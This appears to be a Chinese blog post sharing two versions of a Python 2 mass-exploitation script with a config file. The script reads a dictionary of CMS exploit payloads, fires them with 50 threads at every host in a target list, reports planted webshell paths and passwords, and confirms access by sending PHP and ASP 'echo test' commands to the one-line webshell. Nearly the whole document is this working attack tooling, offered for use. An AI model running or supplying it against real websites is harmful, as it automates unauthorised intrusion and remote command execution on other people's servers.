目标:根据上一篇写的指纹录入工具,可以收集很多cms等漏洞指纹,然后运行该脚本直接获取shell,也可以作为路径扫描程序,同时含有一句话连接验证功能
#coding=utf-8
import requests
import Queue
import threading
import re
queue=Queue.Queue()  # shared work queue of exp_info records: filled by init(), drained by the scan() worker threads
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 测试路径
#exp_info(2) POST 提交的数据 GET 为空
#exp_info(3) 关键字
#exp_info(4) shell的路径
#exp_info(5) shell的密码
#====================================================#
def init():
    """Fill the module-level ``queue`` from ``exp.dic``.

    Every line is stripped and split on ``|``; the resulting list is queued
    as one record (field layout is given in the exp_info header comment).
    Nothing is caught here: a missing file raises IOError to the caller.
    """
    dic = open("exp.dic")
    for line in dic.readlines():
        queue.put(line.strip().split('|'))
    dic.close()
def openUrl(url, GET_POST, pdata):
    """Fetch *url* by GET or POST and return ``(status, encoding, body)``.

    Only status 200 and 500 count as a usable answer. Any other status, and
    any exception raised while building the form or sending the request,
    is collapsed into the sentinel ``(0, 0, False)`` — callers cannot tell
    a timeout from a 404 from a malformed *pdata*. Redirects are not followed.
    """
    try:
        if GET_POST == "POST":
            # "a=1&b=2" -> {"a": "1", "b": "2"}. Commas split fields as well,
            # and a field without exactly one '=' raises ValueError into the
            # bare except below.
            fields = ",".join(pdata.split("&")).split(",")
            form = dict(field.split("=") for field in fields)
            resp = requests.post(url, timeout=20, allow_redirects=False, data=form)
        else:
            resp = requests.get(url, timeout=20, allow_redirects=False)
        body = resp.content
        resp.close()
        if resp.status_code not in (200, 500):
            return (0, 0, False)
        return (resp.status_code, resp.encoding, body)
    except:
        # Network errors, timeouts and bad form data all land here.
        return (0, 0, False)
def checkKeyWord(page, page_encoding, keyword):
    """Return True when regex *keyword* matches *page* decoded as *page_encoding*.

    A body that cannot be decoded (or an unknown encoding name) counts as no
    match. An invalid regex in *keyword* is not caught and raises re.error.
    """
    try:
        text = unicode(page, page_encoding)
    except:
        return False
    matches = re.compile(keyword).findall(text)
    return len(matches) > 0
def checkConnectionSuccess(shell_url, pdata):
    """POST *pdata* to *shell_url* and print whether the body is exactly ``test``.

    openUrl() returns False for a failed or non-200/500 request, so that case
    prints the failure message as well. Nothing is returned.
    """
    _status, _encoding, body = openUrl(shell_url, "POST", pdata)
    verdict = " the connection is successful " if body == "test" else "the connection is fail"
    print(verdict)
def checkGetShellSuccess(shell_url, shell_pwd):
    """Pick the echo probe by the URL's trailing extension and run checkConnectionSuccess().

    The extension is whatever follows the last ``.`` of the whole URL.
    ``php`` and ``asp`` have their own probe; anything else gets the third one.
    Returns whatever checkConnectionSuccess() returns (None).
    """
    ext = shell_url.split(".")[-1]
    probes = {
        'php': '=echo "test";',
        'asp': '=execute("response.clear:response.write(""test""):response.end")',
    }
    fallback = '=Response.Clear();Response.Write("test");'
    pdata = shell_pwd + probes.get(ext, fallback)
    return checkConnectionSuccess(shell_url, pdata)
def output(content,status_code,page_encoding,test_url,re_keyword,shell_url,shell_pwd):
    """Print the verdict for one probe and, on a keyword hit, test the shell.

    ``content`` is the third element of openUrl()'s result: False for a
    failed/ignored request (nothing is printed), otherwise the response body.
    ``re_keyword`` is the regex looked for in the body; ``None`` means the
    status code alone counts as a hit. ``shell_url``/``shell_pwd`` are only
    reported (and probed) when ``shell_url`` is not None.
    """
    if content is not False:
        if content is None:
            # openUrl() in this file never yields None itself; this would only
            # come from a response whose .content is None.
            print '[-]status[%s]---%s |no foud data' % (status_code, test_url)
        else:
            if re_keyword is None:
                if shell_url is None:
                    # NOTE(review): three %s placeholders but a two-item tuple — this
                    # line raises TypeError if reached. scan() always passes a string
                    # shell_url, so the branch is dead in this file.
                    print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
                else:
                    print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
            else:
                if checkKeyWord(content, page_encoding, re_keyword) is True:
                    if shell_url is None:
                        # NOTE(review): same placeholder/argument mismatch as above.
                        print '[+]status[%s]---shell url: %s | password: %s' % (status_code, test_url)
                    else:
                        print '[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd)
                        # check whether the one-liner shell answers the echo probe
                        checkGetShellSuccess(shell_url, shell_pwd)
                else:
                    print '[-]status[%s]---%s is possible' % (status_code, test_url)
def scan(url):
    """Worker loop: take records off the global ``queue`` and probe them against *url*.

    Each record is an exp_info list (method, path, post data, keyword, shell
    path, shell password). Field lookups are by index, so a short record
    raises IndexError and the thread dies without calling task_done().
    """
    while not queue.empty():
        # empty()/get() are two separate calls; if another worker takes the
        # last record in between, this get(True) blocks with no timeout.
        record = queue.get(True)
        method = record[0]
        test_url = url + record[1]
        post_data = record[2]
        re_keyword = record[3]
        shell_url = url + record[4]
        shell_pwd = record[5]
        status_code, page_encoding, content = openUrl(test_url, method, post_data)
        output(content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
        queue.task_done()
if __name__ == "__main__":
    threadNum = 50  # worker threads started per target
    targets = open("2.txt")  # one target host per line, scheme is added below
    for line in targets.readlines():
        init()  # refill the queue for every target; exp.dic is re-read each time
        url = "http://" + line.strip()
        print("scanning " + url)
        for _ in range(threadNum):
            threading.Thread(target=scan, args=(url,)).start()
        queue.join()  # wait until every queued record has been task_done()'d
    targets.close()
    raw_input('press enter key to exit')  # keeps the console window open
利用pyinstaller 打包成exe,运行结果如下:
最新加入了一句话验证功能
优化版本
a)添加配置文件
b)文件不存在捕获提示
c)输出提示更完善
getshell.py
#coding=utf-8
import requests
import Queue
import threading
import re
import ConfigParser
queue=Queue.Queue()  # shared work queue of exp_info records: filled by init(), drained by the scan() worker threads
#===================================================#
#exp_info
#exp_info(0) 提交的方式
#exp_info(1) 测试路径
#exp_info(2) POST 提交的数据 GET 为空
#exp_info(3) 关键字
#exp_info(4) shell的路径
#exp_info(5) shell的密码
#====================================================#
def init(filename):
    """Fill the module-level ``queue`` from *filename*, one ``|``-split record per line.

    Returns False when the file cannot be opened or read (any exception is
    swallowed), None on success. On error the handle is not closed explicitly.
    """
    try:
        dic = open(filename)
        for line in dic.readlines():
            queue.put(line.strip().split('|'))
        dic.close()
    except:
        return False
def openUrl(url, GET_POST, pdata):
    """Fetch *url* by GET or POST and return ``(status, encoding, body)``.

    Only status 200 and 500 count as a usable answer. Any other status, and
    any exception raised while building the form or sending the request,
    is collapsed into the sentinel ``(0, 0, False)`` — callers cannot tell
    a timeout from a 404 from a malformed *pdata*. Redirects are not followed.
    """
    try:
        if GET_POST == "POST":
            # "a=1&b=2" -> {"a": "1", "b": "2"}. Commas split fields as well,
            # and a field without exactly one '=' raises ValueError into the
            # bare except below.
            fields = ",".join(pdata.split("&")).split(",")
            form = dict(field.split("=") for field in fields)
            resp = requests.post(url, timeout=20, allow_redirects=False, data=form)
        else:
            resp = requests.get(url, timeout=20, allow_redirects=False)
        body = resp.content
        resp.close()
        if resp.status_code not in (200, 500):
            return (0, 0, False)
        return (resp.status_code, resp.encoding, body)
    except:
        # Network errors, timeouts and bad form data all land here.
        return (0, 0, False)
def checkKeyWord(page, page_encoding, keyword):
    """Return True when regex *keyword* matches *page* decoded as *page_encoding*.

    A body that cannot be decoded (or an unknown encoding name) counts as no
    match. An invalid regex in *keyword* is not caught and raises re.error.
    """
    try:
        text = unicode(page, page_encoding)
    except:
        return False
    matches = re.compile(keyword).findall(text)
    return len(matches) > 0
def checkConnectionSuccess(shell_url, pdata):
    """POST *pdata* to *shell_url* and print whether the body is exactly ``test``.

    openUrl() returns False for a failed or non-200/500 request, so that case
    prints the failure message as well. Nothing is returned.
    """
    _status, _encoding, body = openUrl(shell_url, "POST", pdata)
    verdict = " the connection is successful " if body == "test" else "the connection is fail"
    print(verdict)
def checkGetShellSuccess(shell_url, shell_pwd):
    """Pick the echo probe by the URL's trailing extension and run checkConnectionSuccess().

    The extension is whatever follows the last ``.`` of the whole URL. Only
    ``php`` is distinguished; every other extension gets the second probe.
    Nothing is returned.
    """
    ext = shell_url.split(".")[-1]
    if ext == 'php':
        probe = '=echo "test";'
    else:
        probe = '=execute("response.clear:response.write(""test""):response.end")'
    checkConnectionSuccess(shell_url, shell_pwd + probe)
def output(url, content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd):
    """Print the verdict for one probe; on a keyword hit with its own shell path, probe the shell.

    ``content`` is openUrl()'s body: False means the request failed or was
    ignored and nothing is printed. ``shell_url == url`` means the record
    carried an empty shell path, so only the test URL is reported and the
    echo probe is skipped. ``re_keyword`` None means the status code alone
    counts as a hit.
    """
    if content is False:
        return
    if content is None:
        print('[-]status[%s]---%s |no foud data' % (status_code, test_url))
        return
    if re_keyword is None:
        if shell_url == url:
            print('[+]status[%s]---shell url: %s ' % (status_code, test_url))
        else:
            print('[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd))
        return
    if checkKeyWord(content, page_encoding, re_keyword) is not True:
        print('[-]status[%s]---%s is possible' % (status_code, test_url))
        return
    if shell_url == url:
        print('[+]status[%s]---shell url: %s ' % (status_code, test_url))
        return
    print(test_url)
    print('[+]status[%s]---shell url: %s | password: %s' % (status_code, shell_url, shell_pwd))
    # Only a record with a distinct shell path gets the echo probe.
    checkGetShellSuccess(shell_url, shell_pwd)
def scan(url):
    """Worker loop: take records off the global ``queue`` and probe them against *url*.

    Each record is an exp_info list (method, path, post data, keyword, shell
    path, shell password). Field lookups are by index, so a short record
    raises IndexError and the thread dies without calling task_done().
    """
    while not queue.empty():
        # empty()/get() are two separate calls; if another worker takes the
        # last record in between, this get(True) blocks with no timeout.
        record = queue.get(True)
        method = record[0]
        test_url = url + record[1]
        post_data = record[2]
        re_keyword = record[3]
        shell_url = url + record[4]
        shell_pwd = record[5]
        status_code, page_encoding, content = openUrl(test_url, method, post_data)
        output(url, content, status_code, page_encoding, test_url, re_keyword, shell_url, shell_pwd)
        queue.task_done()
def configRead():
    """Read the two file paths from the ``[file_path]`` section of ``config.ini``.

    Returns ``(test_url_file_path, exp_file_path)``. A missing config.ini or
    missing key raises to the caller; the file handle is never closed explicitly.
    """
    parser = ConfigParser.ConfigParser()
    parser.readfp(open('config.ini'))
    section = "file_path"
    return (parser.get(section, "test_url_file_path"),
            parser.get(section, "exp_file_path"))
if __name__ == "__main__":
    # configRead() is outside the try: a missing config.ini raises uncaught.
    test_url_file_path, exp_file_path = configRead()
    threadNum = 50  # worker threads started per target
    try:
        targets = open(test_url_file_path)
        for line in targets.readlines():
            # init() returns False when the exp file cannot be read.
            if init(exp_file_path) is False:
                print("exp file not found")
                break
            url = "http://" + line.strip()
            print("scanning " + url)
            for _ in range(threadNum):
                threading.Thread(target=scan, args=(url,)).start()
            queue.join()  # wait until every queued record has been task_done()'d
        targets.close()
    except:
        # Any exception inside the try — not only a missing file — prints this.
        print("test web url file not found")
    raw_input('press enter key to exit')  # keeps the console window open
配置文件
config.ini
[file_path]
;网站测试文件路径
test_url_file_path=2.txt
;exp文件路径
exp_file_path=exp.dic